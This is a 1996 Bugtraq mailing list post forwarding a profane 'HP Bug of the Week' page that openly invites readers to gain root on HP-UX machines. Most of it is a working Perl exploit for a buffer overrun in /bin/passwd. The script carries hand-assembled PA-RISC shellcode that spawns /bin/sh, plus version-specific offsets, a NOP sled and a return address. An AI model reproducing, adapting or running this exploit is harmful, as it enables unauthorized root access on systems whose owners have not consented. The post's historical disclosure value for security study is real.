Bugtraq mailing list archives

HP Bug of the Week!


From: aleph1 () dfw net (Aleph One)
Date: Sat, 23 Nov 1996 08:19:34 -0600


From our SOD friends (http://command.com.inter.net/~sod/); Press D now if
you are easily offended:

   This week: If I had a life, I wouldn't spend my Friday nights giving
   you bugs


   Good fuckin' day, eh? Welcome to the HP Bug of the Week -- if you
   haven't come here looking for security holes to HP/UX computers,
   you've come to the wrong fucking place. Otherwise look no further
   because you've found the fuckin' mecca of the fuckin' desert. Our goal
   here is to distribute those HP bugeridoo's as far and wide as is
   fucking humanly possible, so tell a friend if you have one. We've got
   a root hole from a buffer overrun in /bin/passwd this week, plus a
   whole new section called "Other Folks Scripts" that rakes in the
   wonderful works of other net.scriptors. So come on in, look around,
   take all you want but eat all you take and as always, start clicking
   your way to root access with scripts from the motherfuckin' folks at
   SOD.

   Vulgarity rating: 6 (scalawag)

Caveat Emptor

   passwd is broked script for this week

#!/usr/bin/perl

# SOD /bin/passwd buffer overrun

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;

if ($rev eq "10") {
  $offset=2102;
  $prealign="AA"; # 2 byte pre
  $postalign=""; # 0 byte post
  $pcoq=h2cs("7b03b463");
  } else {
  $offset=2170; # 2170 works for 9.X...
  $prealign=""; # zero byte pre
  $postalign="PP"; # 2 byte post
  $pcoq=h2cs("7b033018");
  }

$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg1,arg1,arg1
$code.=h2cs("0b180298"); # XOR arg2,arg2,arg2
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff

$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/bin/passwd","$of");


Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01